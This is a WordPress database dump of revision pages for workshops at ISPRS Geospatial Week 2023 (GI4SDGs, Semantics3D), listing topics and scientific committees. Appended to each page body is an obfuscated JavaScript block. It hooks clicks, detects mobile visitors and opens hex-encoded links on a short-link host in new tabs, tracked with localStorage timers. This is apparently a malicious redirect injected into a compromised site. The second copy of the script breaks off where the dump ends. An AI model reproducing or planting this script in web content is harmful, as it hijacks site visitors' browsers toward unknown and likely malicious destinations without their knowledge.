(3821,1,'2023-02-05 14:06:22','2023-02-05 14:06:22','<p>[vc_row][vc_column width=\"1/4\"][vc_single_image image=\"2770\" img_size=\"1400x1000\"][/vc_column][vc_column width=\"3/4\"][vc_column_text]</p>\n<h5 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: center;\"><strong><span style=\"font-size: 14pt;\">The Geospatial Information and SDG Nexus: GI4SDGs</span></strong></h5>\n<h5></h5>\n<p>&nbsp;</p>\n<h5 style=\"text-align: justify; color: black;\">In September 2015, the United Nations adopted “Transforming Our World: the 2030 Agenda for Sustainable Development” as a new ambitious global development plan with 17 Sustainable Development Goals (SDGs) and 169 targets. Recognizing the complex and diverse challenges the world is facing today, this agenda aims to end extreme poverty, fight inequality and injustice, and combat climate change. In order to ensure its successful implementation, the United Nations has been devoting to establishing a systematic follow-up and review of the progress towards SDGs at national, regional and global levels, through an indicator-based and data-driven monitoring approach.</h5>\n<h5 style=\"text-align: justify; color: black;\">Reliable and up-to-date geospatial data plays a fundamental role in the monitoring process, and the utilization of geospatial tools in SDGs monitoring has become a critical task for ISPRS and international geospatial communities. In the year 2019, ISPRS council has decided to set up a scientific program on “Geospatial Information-enabled SDGs Monitoring for the 2030 Agenda”, jointly with other international organizations. Its overreaching goal is to promote the best use of geospatial information in supporting SDGs monitoring and analysis through mobilizing and integrating all possible resources from ISPRS members and other stakeholders. The first ISPRS workshop on Geospatial Information for Sustainable Development Goals (GI4SDGs) was successfully organized in Changsha, China from Nov.19-20, 2019.</h5>\n<h5 style=\"text-align: justify; color: black;\">This second GI4SDGs workshop will provide an interdisciplinary platform to present the latest development and progress in the area of geospatial-enabled SDG monitoring and application. It will bring together people of different communities and disciplines, such as geomatics and remote sensing, environmental and urban studies, deep learning and service computing. Experts and users will present their novel and innovative methods to highlight successful case studies and to explore possible collaboration.</h5>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"blue\" style=\"shadow\" border_width=\"6\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h5 style=\"text-align: justify; color: red;\"><strong>The workshop will concentrate on the following topics:</strong></h5>\n<h6><strong>⦁ Opportunities and challenges of geospatial information-enabled SDGs;</strong></h6>\n<h6><strong>⦁ SDGs monitoring examples with geospatial perspective;</strong></h6>\n<h6><strong>⦁ Definition and modeling of geospatial essential variables for SDGs monitoring;</strong></h6>\n<h6><strong>⦁ Algorithms and methods for deriving geospatial essential variables, e.g., machine learning, big data analytics, cloud computing and other technologies;</strong></h6>\n<h6><strong>⦁ Global mapping initiatives and progresses at national and international levels;</strong></h6>\n<h6><strong>⦁ Integrating crowd-sourced data and VGI with geospatial data for SDGs monitoring;</strong></h6>\n<h6><strong>⦁ Developments and applications of geospatial knowledge service and collaborative platforms to meet SDGs assessment and monitoring;</strong></h6>\n<h6><strong>⦁ Ethical use of geospatial data and SDGs</strong></h6>\n<h6><strong>⦁ Other related topics.</strong></h6>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<h5 style=\"text-align: justify; color: red;\"><strong>The workshop plans to have the following four technical sessions:</strong></h5>\n<h6><strong>⦁ Session 1: Assessing SDGs progress by integrating geospatial and statistical information</strong></h6>\n<h6><strong>⦁ Session 2: Extracting Geospatial Information for SDGs</strong></h6>\n<h6><strong>⦁ Session 3: Monitoring SDGs with geospatially essential variables</strong></h6>\n<h6><strong>⦁ Session 4: ISPRS Scientific Program GI4SDGs: Progress and Collaboration</strong></h6>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"blue\" style=\"shadow\" border_width=\"5\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h1 style=\"text-align: center;\"><strong>Workshop Chairs</strong></h1>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][dt_team_masonry order=\"asc\" img_border_radius=\"0px\" post_title_bottom_margin=\"0px\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"48\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"blue\" style=\"shadow\" border_width=\"6\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h5 style=\"text-align:justify; color:red;\"><strong>Scientific Committee</strong></h5>\n<p>⦁ Yifang Ban, KTH Royal Institute of Technology, Sweden<br />\n⦁ Maria Antonia Brovelli, Politecnico di Milano, Italy<br />\n⦁ Silvana Philippi Camboin, Universidade Federal do Paraná: Curitiba, Brazil<br />\n⦁ Jun Chen, National Geomatics Center of China, China<br />\n⦁ Laurent Durieux, GEO secretariat, France<br />\n⦁ Hongchao Fan, Norwegian University of Science and Technology, Germany<br />\n⦁ Gregory Giuliani, University of Geneva, Geneva, Switzerland<br />\n⦁ Songnian Li, Toronto Metropolitan University, Canada<br />\n⦁ Marguerite Madden, University of Georgia, USA<br />\n⦁ Lucy W. Mburu, College of Technology, KCA University, Kenya<br />\n⦁ Terje Midtbø, Norwegian University of Science and Technology, Norway<br />\n⦁ Jon Mills, Newcastle University, UK<br />\n⦁ Petros Patias, Aristotle University, Greece<br />\n⦁ Daniele Oxoli, Politecnico di Milano<br />\n⦁ Shu Peng, National Geomatics Center of China, China<br />\n⦁ Aurélie Sand, Centre National d\'Etudes Spatiales, France<br />\n⦁ Hao Wu, National Geomatics Center of China, China<br />\n⦁ Alexander Zipf, Heidelberg University, Germany[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','The Geospatial Information and SDG Nexus: GI4SDGs','','inherit','closed','closed','','2768-autosave-v1','','','2023-02-05 14:06:22','2023-02-05 14:06:22','',2768,'https://gsw2023.com/?p=3821',0,'revision','',0),
(3822,1,'2023-02-05 14:09:59','2023-02-05 14:09:59','<p>[vc_row][vc_column width=\"1/4\"][vc_single_image image=\"2841\" img_size=\"800x800\"][/vc_column][vc_column width=\"3/4\"][vc_column_text]</p>\n<h5 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: center;\"><strong><span style=\"font-size: 14pt;\">Semantics3D - Semantic Scene Analysis and 3D Reconstruction from Images and Image Sequences</span></strong></h5>\n<h5></h5>\n<p>&nbsp;</p>\n<h5 style=\"text-align: justify; color: black;\"><strong>Automated 3D reconstruction and the extraction of semantic information from images and image sequences are important research topics in Photogrammetry, Remote Sensing, GIS, and Computer Vision. This workshop is a follow-up to the first event under the same name embedded in the ISPRS Geospatial Week 2019 in Enschede. It will bring together experts working in photogrammetric 3D reconstruction, semantic interpretation of imagery and image sequence analysis to discuss recent developments, the potential of various data sources, and future trends in 3D reconstruction and information extraction from imagery. Its focus is on methodological research. Semantic3D will be part of the ISPRS Geospatial Week 2023, hosted by the Arab Academy for Science, Technology, and Maritime Transport, in parallel with a number of related geospatial workshops. The event will be held as a two-day single track workshop of oral presentations and poster sessions in the context of the ISPRS Geospatial Week.</strong></h5>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"vista_blue\" style=\"shadow\" border_width=\"6\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h1 style=\"text-align: center;\"><strong>CHAIRS</strong></h1>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][dt_team_masonry order=\"asc\" img_border_radius=\"0px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"50\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"vista_blue\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_single_image image=\"2843\" img_size=\"1600x600\" alignment=\"center\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h5 style=\"text-align: justify; color: blue;\"><strong><u>Themes of event:</u></strong></h5>\n<ul>\n<li>\n<h6><strong>Feature extraction, stereo/multi-view sparse matching, dense image matching</strong></h6>\n</li>\n<li>\n<h6><strong>3D data acquisition and surface reconstruction</strong></h6>\n</li>\n<li>\n<h6><strong>Automatic detection and 3D reconstruction of objects using data from terrestrial, airborne or satellite sensors</strong></h6>\n</li>\n<li>\n<h6><strong>Deep learning and other supervised methods for 3D reconstruction and for the semantic interpretation of 3D scenes based on images, point clouds, or surface meshes</strong></h6>\n</li>\n<li>\n<h6><strong>Multi-source, multi-view, multi-temporal, multi-modal image analysis: Integration of data from multiple viewpoints or multiple sensors for automated object detection and 3D reconstruction</strong></h6>\n</li>\n<li>\n<h6><strong>Integration of existing interpreted data such as historical maps or urban GIS for object detection and reconstruction</strong></h6>\n</li>\n<li>\n<h6><strong>Uncertainty estimation and uncertainty propagation in 3D reconstruction and classification</strong></h6>\n</li>\n<li>\n<h6><strong>Methods for the generation and update of high-resolution 3D city models and road databases</strong></h6>\n</li>\n<li>\n<h6><strong>Object detection, recognition, 3D reconstruction and tracking in the context of robotics or autonomous driving and mobile mapping</strong></h6>\n</li>\n<li>\n<h6><strong>Dynamic scene understanding</strong></h6>\n</li>\n<li>\n<h6><strong>Change detection in image time series and 3D point clouds</strong></h6>\n</li>\n<li>\n<h6><strong>Integration of images, motion and vehicle models</strong></h6>\n</li>\n<li>\n<h6><strong>Video analysis for security/surveillance tasks</strong></h6>\n</li>\n<li>\n<h6><strong>Explainable machine learning for geospatial applications</strong></h6>\n</li>\n<li>\n<h6><strong>Methods to overcome data biases, limited labels, and weak labels</strong></h6>\n</li>\n<li>\n<h6><strong>Evaluation of performance, speed, reliability, robustness, and generalization ability of methods</strong></h6>\n</li>\n</ul>\n<h6></h6>\n<h5 style=\"text-align: justify; color: blue;\"><strong><u>Scientific Committee:</u></strong></h5>\n<ul>\n<li>\n<h6><strong>Ksenia Bittner, German Aerospace Center(DLR), Germany</strong></h6>\n</li>\n<li>\n<h6><strong>Jan Böhm, University College London, UK</strong></h6>\n</li>\n<li>\n<h6><strong>Max Coenen, Leibniz Universität Hannover, Germany</strong></h6>\n</li>\n<li>\n<h6><strong>Pablo d\'Angelo, German Aerospace Center (DLR), Germany</strong></h6>\n</li>\n<li>\n<h6><strong>Friedrich Fraundorfer, Graz University of Technology, Austria</strong></h6>\n</li>\n<li>\n<h6><strong>Markus Gerke, Technische Universität Braunschweig, Germany</strong></h6>\n</li>\n<li>\n<h6><strong>Norbert Haala, University of Stuttgart, Germany</strong></h6>\n</li>\n<li>\n<h6><strong>Dorota Iwanszczuk, TU Darmstadt, Germany</strong></h6>\n</li>\n<li>\n<h6><strong>Jinha Jung, Purdue University, USA</strong></h6>\n</li>\n<li>\n<h6><strong>Arpan Kusari, University of Michigan, USA</strong></h6>\n</li>\n<li>\n<h6><strong>Florent Lafarge, INRIA, Sophia Antipolis, France</strong></h6>\n</li>\n<li>\n<h6><strong>Loic Landrieu, National Geographical Institute, France</strong></h6>\n</li>\n<li>\n<h6><strong>Max Mehltretter, Leibniz Universität Hannover, Germany</strong></h6>\n</li>\n<li>\n<h6><strong>Sander Oude Elberink, University of Twente, The Netherlands</strong></h6>\n</li>\n<li>\n<h6><strong>Charlotte Pelletier, University of Southern Brittany, France</strong></h6>\n</li>\n<li>\n<h6><strong>Ribana Roscher, University of Bonn, Germany</strong></h6>\n</li>\n<li>\n<h6><strong>Franz Rottensteiner, Leibniz Universität Hannover, Germany</strong></h6>\n</li>\n<li>\n<h6><strong>Marc Russwurm, Federal Institute of Technology (EPFL), Lausanne, Switzerland</strong></h6>\n</li>\n<li>\n<h6><strong>Maria Vakalopoulou, University of Paris-Saclay, France</strong></h6>\n</li>\n<li>\n<h6><strong>Bruno Vallet, Institut Géographique National (IGN), France</strong></h6>\n</li>\n<li>\n<h6><strong>Jan Dirk Wegner, University of Zurich, Switzerland</strong></h6>\n</li>\n<li>\n<h6><strong>Martin Weinmann, Karlsruhe Institute of Technology, Germany</strong></h6>\n</li>\n<li>\n<h6><strong>Wen Xiao, China University of Geosciences, China</strong></h6>\n</li>\n<li>\n<h6><strong>Bisheng Yang, Wuhan University, China</strong></h6>\n</li>\n<li>\n<h6><strong>Michael Ying Yang, University of Twente, The Netherlands</strong></h6>\n</li>\n</ul>\n<h6><strong>Others tba.</strong></h6>\n<h6></h6>\n<h5 style=\"text-align: justify; color: blue;\"><strong><u>Supporting ISPRS Working Groups:</u></strong></h5>\n<ul>\n<li>\n<h6><strong>WG II/2 Point cloud acquisition and processing </strong></h6>\n</li>\n<li>\n<h6><strong>WG II/3 3D scene reconstruction for modeling &amp; mapping</strong></h6>\n</li>\n<li>\n<h6><strong>WG II/4 AI / ML for geospatial data</strong></h6>\n</li>\n<li>\n<h6><strong>WG II/5 Temporal geospatial data understanding</strong></h6>\n</li>\n</ul>\n<h6><strong><u> </u></strong></h6>\n<h5 style=\"text-align: justify; color: blue;\"><strong><u>Special Issue dedicated to the workshop: </u></strong></h5>\n<h6><strong>After the workshop, authors of selected papers will be invited to submit extended versions of their papers to the journal PFG – Journal of Photogrammetry, Remote Sensing and Geoinformation Science (<a style=\"text-align:justify; color:blue;\" href=\"https://www.springer.com/journal/41064\">https://www.springer.com/journal/41064)</a>; current impact factor: 3.292). The papers being accepted after the peer-review process of the journal will appear in a special issue of that journal dedicated to this workshop. </strong></h6>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( 